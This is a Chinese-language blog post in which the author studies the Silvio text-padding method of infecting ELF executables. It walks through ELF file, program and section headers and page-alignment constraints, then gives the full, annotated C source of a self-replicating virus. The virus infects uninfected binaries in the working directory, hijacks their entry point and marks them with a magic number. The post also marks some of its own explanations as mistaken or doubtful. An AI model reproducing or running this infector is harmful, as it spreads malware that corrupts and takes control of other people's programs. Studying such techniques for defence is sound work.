以下参考文章:
相关源码可以从以下两个网站查询(silvio的实际源码作者并没有给出):
silvio病毒填充技术,是在上世纪90年代就已经提出的一种简单的寄生技术,主要就是因为虚拟内存技术中对于虚拟内存分页管理方法的一种利用。在text段和data段之间的内存页中放入寄生虫。
这里关于段与节的说法我不是很清楚,实际上如果说是在text段和data段的说法的话,那我们通过vmmap可以看到:
三个红色即protect为r-xp的就是代码段,粉色protect为rw-p的为data段,我无法确认其中是否有空闲的memory放置shellcode(即parasite)。
若是为节,我们可以通过readelf -S 查看:
通过计算,我们可以得到.text节:size:0x195,对齐方式为16字节对齐,所以可以得到占
以上错误
即为一页,同样的如果为段的话:size:0x200:
因为页对齐机制,所以实际分得1k memory。可以通过上面vmmap看到。所以有约为4/5k大小空闲。
data段也大致相同
依旧为1页。
通过上面我们也可以看到,实际上text段和data段起始位置不太一样:text往往都是从起始地址开始写:
而data段开头:
并不是从页开头写的。
虽然对于当前绝大多数的程序,因为可重定位代码的高效,安全性,而选择可重定位的方式,但这并不意味着他禁止使用了绝对代码(absoluate code),比如立即数,所以这里我们认为,如果要进行一个寄生虫的注射,必然不能干扰源程序的运行,即这里需要使用程序无关代码(pic)。
例如,我们如果往text段前或者后拓展,极有可能会覆盖数据,导致文件错误,无法执行(即破坏了重定位地址,或者绝对代码),往data段前填充或许是一种办法(因为data段就在stack段下方,空间足够),但是data段的执行权限不好把握,所以这里作者给出了一种实现方法:
在page边界开始填充,通过前面的计算,我们可以看到无论是代码段还是data段,都有大片冗余空间,没有好好利用。
PIC(position-independent-code)称作地址无关代码,出现原因是为了让多个进程能够共用一个动态库,因为不同进程中需要映入的地址是不同的,所以为了让程序在装载过程中都能运行,PIC诞生了。
PIC的做法是让指令部分做到地址无关,所以可以让所有进程共享一份。但是数据部分并不地址无关,而是让所有进程在地址空间中都产生一份副本。
所谓地址无关代码 PIC(Place Independent Code)就是其变量,标号,以及调用函数不使用编译时生成内存地址,因此能够加载入内存中的任何位置执行的代码。例如plt,got,重定位表等等
下面我们着重介绍三个头
在/usr/include/elf.h下可以找到:即为上图
struct:
ccat elf.h| grep 'e_'
unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
Elf32_Half e_type; /* Object file type */
Elf32_Half e_machine; /* Architecture */
Elf32_Word e_version; /* Object file version */
Elf32_Addr e_entry; /* Entry point virtual address */
Elf32_Off e_phoff; /* Program header table file offset */
Elf32_Off e_shoff; /* Section header table file offset */
Elf32_Word e_flags; /* Processor-specific flags */
Elf32_Half e_ehsize; /* ELF header size in bytes */
Elf32_Half e_phentsize; /* Program header table entry size */
Elf32_Half e_phnum; /* Program header table entry count */
Elf32_Half e_shentsize; /* Section header table entry size */
Elf32_Half e_shnum; /* Section header table entry count */
Elf32_Half e_shstrndx; /* Section header string table index */
unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
Elf64_Half e_type; /* Object file type */
Elf64_Half e_machine; /* Architecture */
Elf64_Word e_version; /* Object file version */
Elf64_Addr e_entry; /* Entry point virtual address */
Elf64_Off e_phoff; /* Program header table file offset */
Elf64_Off e_shoff; /* Section header table file offset */
Elf64_Word e_flags; /* Processor-specific flags */
Elf64_Half e_ehsize; /* ELF header size in bytes */
Elf64_Half e_phentsize; /* Program header table entry size */
Elf64_Half e_phnum; /* Program header table entry count */
Elf64_Half e_shentsize; /* Section header table entry size */
Elf64_Half e_shnum; /* Section header table entry count */
Elf64_Half e_shstrndx; /* Section header string table index */
这里主要注意的是ELF header位于文件开头,便于寻找定位,同样的它还标出了program header ,entrypoint以及 section header的address和size
c cat elf.h| grep 'sh_'
Elf32_Word sh_name; /* Section name (string tbl index) */
Elf32_Word sh_type; /* Section type */
Elf32_Word sh_flags; /* Section flags */
Elf32_Addr sh_addr; /* Section virtual addr at execution */
Elf32_Off sh_offset; /* Section file offset */
Elf32_Word sh_size; /* Section size in bytes */
Elf32_Word sh_link; /* Link to another section */
Elf32_Word sh_info; /* Additional section information */
Elf32_Word sh_addralign; /* Section alignment */
Elf32_Word sh_entsize; /* Entry size if section holds table */
--------------------------------------------------------------------------------------
Elf64_Word sh_name; /* Section name (string tbl index) */
Elf64_Word sh_type; /* Section type */
Elf64_Xword sh_flags; /* Section flags */
Elf64_Addr sh_addr; /* Section virtual addr at execution */
Elf64_Off sh_offset; /* Section file offset */
Elf64_Xword sh_size; /* Section size in bytes */
Elf64_Word sh_link; /* Link to another section */
Elf64_Word sh_info; /* Additional section information */
Elf64_Xword sh_addralign; /* Section alignment */
Elf64_Xword sh_entsize; /* Entry size if section holds table */
struct:
c cat elf.h| grep 'p_'
Elf32_Word p_type; /* Segment type */
Elf32_Off p_offset; /* Segment file offset */
Elf32_Addr p_vaddr; /* Segment virtual address */
Elf32_Addr p_paddr; /* Segment physical address */
Elf32_Word p_filesz; /* Segment size in file */
Elf32_Word p_memsz; /* Segment size in memory */
Elf32_Word p_flags; /* Segment flags */
Elf32_Word p_align; /* Segment alignment */
---
Elf64_Word p_type; /* Segment type */
Elf64_Word p_flags; /* Segment flags */
Elf64_Off p_offset; /* Segment file offset */
Elf64_Addr p_vaddr; /* Segment virtual address */
Elf64_Addr p_paddr; /* Segment physical address */
Elf64_Xword p_filesz; /* Segment size in file */
Elf64_Xword p_memsz; /* Segment size in memory */
Elf64_Xword p_align; /* Segment alignment */
程序头描述了程序执行与其相关文件的数据结构,主要用于定位程序段的位置以及其他信息,如上图中地址和size。
load表示为可加载段,第二个其实就是text段
就如文中所说的:
在parasite紧连着text段。
因此,我们一般认为parasite需要为程序的入口点,这一位置已经在ELF header中标出,并且他还需要有跳转执行源程序的能力。
通过entry_point可以控制执行流,而e_phoff可以找到programheader地址(使用lseek)
texlseek(): repositions the file offset of the open file description associated with the file descriptor fd to the argument offset according to the directive whence as follows:
同样的也正是因为ELF header规定了文件的大致脉络,所以当我们往代码段后端填充时,也需要同步更改程序头表中的size大小,以及其他以符合文件。
存疑,不清楚为什么需要更改p_offset以及sh_offset
类似的,还需要改节头的偏移,因为我们可以从文件头中发现节头表实际上位于文件段尾部,如果填充parasite就会影响节头的偏移
疑问:
texThere is one hitch however. Following the ELF specifications, p_vaddr and p_offset in the Phdr must be congruent together, to modulo the page size. key: ~= is denoting congruency. p_vaddr (mod PAGE_SIZE) ~= p_offset (mod PAGE_SIZE)
这里作者给出了几种设想:分别是向前拓展代码段,向后拓展代码段以及向前拓展data段。但同样的这几种相法都有很严重的错误:
总的来说,parasite寄生虫应该插入代码段最后一个节的末尾,这里一般认为时.fini节
因为作者文中所用的文件是32位,所以这里我们也先看32位程序是如何执行的。
还是先看三个头:文件头,程序段头和程序节头。
shell> readelf -h hello
ELF Header:
Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: DYN (Shared object file)
Machine: Intel 80386
Version: 0x1
Entry point address: 0x410
Start of program headers: 52 (bytes into file)
Start of section headers: 6092 (bytes into file)
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 9
Size of section headers: 40 (bytes)
Number of section headers: 29
Section header string table index: 28
32位的文件头和64位的文件头大致没什么区别。
shell> readelf -l hello1
Elf file type is EXEC (Executable file)
Entry point 0x8048340
There are 9 program headers, starting at offset 52
Program Headers:
Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align
PHDR 0x000034 0x08048034 0x08048034 0x00120 0x00120 R 0x4
INTERP 0x000154 0x08048154 0x08048154 0x00013 0x00013 R 0x1
[Requesting program interpreter: /lib/ld-linux.so.2]
LOAD 0x000000 0x08048000 0x08048000 0x006d0 0x006d0 R E 0x1000
LOAD 0x000f0c 0x08049f0c 0x08049f0c 0x00114 0x00118 RW 0x1000
DYNAMIC 0x000f14 0x08049f14 0x08049f14 0x000e8 0x000e8 RW 0x4
NOTE 0x000168 0x08048168 0x08048168 0x00044 0x00044 R 0x4
GNU_EH_FRAME 0x00057c 0x0804857c 0x0804857c 0x00044 0x00044 R 0x4
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x10
GNU_RELRO 0x000f0c 0x08049f0c 0x08049f0c 0x000f4 0x000f4 R 0x1
Section to Segment mapping:
Segment Sections...
00
01 .interp
02 .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame
03 .init_array .fini_array .dynamic .got .got.plt .data .bss
04 .dynamic
05 .note.ABI-tag .note.gnu.build-id
06 .eh_frame_hdr
07
08 .init_array .fini_array .dynamic .got
这里段头可以看出和64位程序很大的不同,32位就很符合文中作,者描述的代码段和data段之间的关系,紧邻的,而64位实际映射过程中,在代码段和data段之间映射一块.rodata段(权限为r,只读)。(但是这里看的很迷,终于解惑)(64位大抵也是可以插在rodata与text段之间)
并且这里还有一点恒重要,就是这里文件头,节表头以及段表头都是可读可执行,这和64位程序是不一样的(我之前一直有疑问:如果文件头,节头表以及段头表都会不可写如何修改节头表和段表)
这里还有一点就是我实际并不清楚是不是所有的32为程序都是这样没有.rodata段,这里也是因为我自己编译了好几份32位,发现都是这般。
同理得,我们依旧是往代码段和data段之间多出来的文件空间里面填充,但是这里有一个问题就是:对于可执行文件来说,节头表是在代码段末尾的,如果我们往代码段末尾填充,极可能会对这一个节头表产生新偏移,并间接导致程序头表出现问题,
但有一个问题。根据 ELF 规范,在 Phdr 中,p_vaddr 和 p_offset 必须同位,与页面大小相乘。即:
cp_vaddr (mod PAGE_SIZE) ~= p_offset (mod PAGE_SIZE)
这就意味着如果我们需要在代码段末尾进行一个填充就必须得插入这样一段与页面大小相等的内存空间。
总的说我们对于这样一个病毒填充需要做到以下几点:
txt* -= DISCLAIMER =- * This code is purely for research purposes and so that the reader may have a deeper understanding * of UNIX Virus infection within ELF executables. * * Behavior: * The virus copies itself to the first uninfected executable that it has write permissions to, * therefore the virus copies itself one executable at a time. The virus writes a bit of magic * into each binary that it infects so that it knows not to re-infect it. The virus at present * only infects files within the current working directory, but can easily be modified. * * This virus extends/creates a PAGE size padding at the end of the text segment within the host * executable, and copies itself into that location. The original entry point is patched to the * start of the parasite which returns control back to the host after its execution. * The code is position independent and eludes libc through syscall macros. * * Compile: * gcc virus.c -o virus -nostdlib
c#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <linux/fcntl.h>
#include <errno.h>
#include <elf.h>
#include <asm/unistd.h>
#include <asm/stat.h>
#define PAGE_SIZE 4096
#define BUF_SIZE 1024
#define TMP "vx.tmp"
void end_code(void);
unsigned long get_eip();
unsigned long old_e_entry;
void end_code(void);
void mirror_binary_with_parasite (unsigned int, unsigned char *, unsigned int,
struct stat, char *, unsigned long);
extern int myend;
extern int foobar;
extern int real_start;
_start()
{
__asm__(".globl real_start\n"
"real_start:\n"
"pusha\n"
"call do_main\n"
"popa\n"
"jmp myend\n");
}
do_main()
{
struct linux_dirent
{
long d_ino;
off_t d_off;
unsigned short d_reclen;
char d_name[];
};
char *host;
char buf[BUF_SIZE];
char cwd[2];
struct linux_dirent *d;
int bpos;
int dd, nread;
unsigned char *tp;
int fd, i, c;
char text_found;
mode_t mode;
struct stat st;
unsigned long address_of_main = get_eip() - ((char *)&foobar - (char *)&real_start);
unsigned int parasite_size = (char *)&myend - (char *)&real_start;
parasite_size += 7;
unsigned long int leap_offset;
unsigned long parasite_vaddr;
unsigned int numbytes;
Elf32_Shdr *s_hdr;
Elf32_Ehdr *e_hdr;
Elf32_Phdr *p_hdr;
unsigned long text;
int nc;
int magic = 32769;
int m, md;
text_found = 0;
unsigned int after_insertion_offset;
unsigned int end_of_text;
char infected;
cwd[0] = '.';
cwd[1] = 0;
dd = open (cwd, O_RDONLY | O_DIRECTORY);
nread = getdents (dd, buf, BUF_SIZE);
for (bpos = 0; bpos < nread;) {
d = (struct linux_dirent *) (buf + bpos); //获取目录信息
bpos += d->d_reclen;
host = d->d_name;//获取当前目录文件名
if (host[0] == '.')
continue;//如果文件以.开头一般我们认为是隐藏文件,直接跳过
if (host[0] == 'l')
continue;//以l开头一般认为是软链接文件,也跳过
fd = open (d->d_name, O_RDONLY); //以只读模式打开
stat(host, &st);//获取文件状态信息
char mem[st.st_size];//,定义了一个大小为当前文件大小的字符数组,根据文件大小分配内存
infected = 0;//标志位
c = read (fd, mem, st.st_size);//从打开的文件中读取数据到mem中
e_hdr = (Elf32_Ehdr *) mem;//通过读取的数据访问文件头表
if (e_hdr->e_ident[0] != 0x7f && strcmp (&e_hdr->e_ident[1], "ELF")) //判断文件是否为ELF可执行文件
{
close (fd);
continue;
}
else
{
p_hdr = (Elf32_Phdr *) (mem + e_hdr->e_phoff);//获取段头地址
for (i = e_hdr->e_phnum; i-- > 0; p_hdr++)//循环遍历段头,查找代码段
{
if (p_hdr->p_type == PT_LOAD)
{
if (p_hdr->p_flags == (PF_R | PF_X))//通过权限判断手否为代码段
{
md = open(d->d_name, O_RDONLY);
unsigned int pt = (PAGE_SIZE - 4) - parasite_size;
lseek(md, p_hdr->p_offset + p_hdr->p_filesz + pt, SEEK_SET);
read(md, &m, sizeof(magic));
if (m == magic)
infected++;
close(md);
break;
}
}
}
} //已经被感染
if (infected)
{
close(fd);
continue;
}
else//未被感染
{
p_hdr = (Elf32_Phdr *) (mem + e_hdr->e_phoff);
for (i = e_hdr->e_phnum; i-- > 0; p_hdr++)
{
if (text_found) //已经找到代码段,说明此时i为数据段,所以是对数据段的偏移添加一页
{
p_hdr->p_offset += PAGE_SIZE;
continue;
}
else
if (p_hdr->p_type == PT_LOAD) //查询代码段
{
if (p_hdr->p_flags == (PF_R | PF_X))
{
text = p_hdr->p_vaddr;//获取代码段的虚拟地址
parasite_vaddr = p_hdr->p_vaddr + p_hdr->p_filesz;//寄生虫地址为代码段的虚拟地址+代码段的大小
old_e_entry = e_hdr->e_entry;//保存原始入口地址
e_hdr->e_entry = parasite_vaddr;//设置新入口点地址
end_of_text = p_hdr->p_offset + p_hdr->p_filesz;//代码段结束地址
p_hdr->p_filesz += parasite_size; //重新设置代码段的大小
p_hdr->p_memsz += parasite_size;//同上
text_found++;
}
}
}
}
s_hdr = (Elf32_Shdr *) (mem + e_hdr->e_shoff);
for (i = e_hdr->e_shnum; i-- > 0; s_hdr++)
{
if (s_hdr->sh_offset >= end_of_text)//判断该节是否在我们更该的代码段之后,如果是那么就向后拓展
s_hdr->sh_offset += PAGE_SIZE;
else
if (s_hdr->sh_size + s_hdr->sh_addr == parasite_vaddr)
s_hdr->sh_size += parasite_size;//判断该届是否为我们修改的段的那一节
}
e_hdr->e_shoff += PAGE_SIZE;//修改节头表偏移,因为节头表在代码段末尾
mirror_binary_with_parasite (parasite_size, mem, end_of_text, st, host, address_of_main);//镜像
close (fd);
goto done;
}
done:
close (dd);
}
void
mirror_binary_with_parasite (unsigned int psize, unsigned char *mem,
unsigned int end_of_text, struct stat st, char *host, unsigned long address_of_main)
{
int ofd;
unsigned int c;
int i, t = 0;
int magic = 32769;
char tmp[3];
tmp[0] = '.';
tmp[1] = 'v';
tmp[2] = 0;
char jmp_code[7];
jmp_code[0] = '\x68'; /* push */
jmp_code[1] = '\x00'; /* 00 */
jmp_code[2] = '\x00'; /* 00 */
jmp_code[3] = '\x00'; /* 00 */
jmp_code[4] = '\x00'; /* 00 */
jmp_code[5] = '\xc3'; /* ret */
jmp_code[6] = 0;
int return_entry_start = 1;
ofd = open (tmp, O_CREAT | O_WRONLY | O_TRUNC, st.st_mode);//创建一个临时文件
write (ofd, mem, end_of_text);//将原始文件的代码段写入临时文件
*(unsigned long *) &jmp_code[1] = old_e_entry;//将原始入口地址写入跳转代码中
write (ofd, (char *)address_of_main, psize - 7);//将寄生虫代码写入临时文件
write (ofd, jmp_code, 7);//将跳转代码写入临时文件
lseek (ofd, (PAGE_SIZE - 4) - psize, SEEK_CUR); //将指针移动到寄生代码结束位置,并写入魔术数,已表明已被感染
write (ofd, &magic, sizeof(magic));//
mem += end_of_text;
unsigned int last_chunk = st.st_size - end_of_text;
write (ofd, mem, last_chunk);
rename (tmp, host);
close (ofd);
}
unsigned long get_eip(void)
{
__asm__("call foobar\n"
".globl foobar\n"
"foobar:\n"
"pop %eax");
}
#define __syscall0(type,name) \
type name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name)); \
return(type)__res; \
}
#define __syscall1(type,name,type1,arg1) \
type name(type1 arg1) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1))); \
return(type)__res; \
}
#define __syscall2(type,name,type1,arg1,type2,arg2) \
type name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
return(type)__res; \
}
#define __syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3))); \
return(type)__res; \
}
#define __syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
type name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4))); \
return(type)__res; \
}
#define __syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5) \
type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5))); \
return(type)__res; \
}
#define __syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5,type6,arg6) \
type name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \
{ \
long __res; \
__asm__ volatile ("push %%ebp ; movl %%eax,%%ebp ; movl %1,%%eax ; int $0x80 ; pop %%ebp" \
: "=a" (__res) \
: "i" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"S" ((long)(arg4)),"D" ((long)(arg5)), \
"0" ((long)(arg6))); \
return(type),__res; \
}
__syscall1(void, exit, int, status);
__syscall3(ssize_t, write, int, fd, const void *, buf, size_t, count);
__syscall3(off_t, lseek, int, fildes, off_t, offset, int, whence);
__syscall2(int, fstat, int, fildes, struct stat * , buf);
__syscall2(int, rename, const char *, old, const char *, new);
__syscall3(int, open, const char *, pathname, int, flags, mode_t, mode);
__syscall1(int, close, int, fd);
__syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count);
__syscall3(int, read, int, fd, void *, buf, size_t, count);
__syscall2(int, stat, const char *, path, struct stat *, buf);
void end_code() {
__asm__(".globl myend\n"
"myend: \n"
"mov $1,%eax \n"
"mov $0,%ebx \n"
"int $0x80 \n");
}
本文作者:Hyrink
本文链接:
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!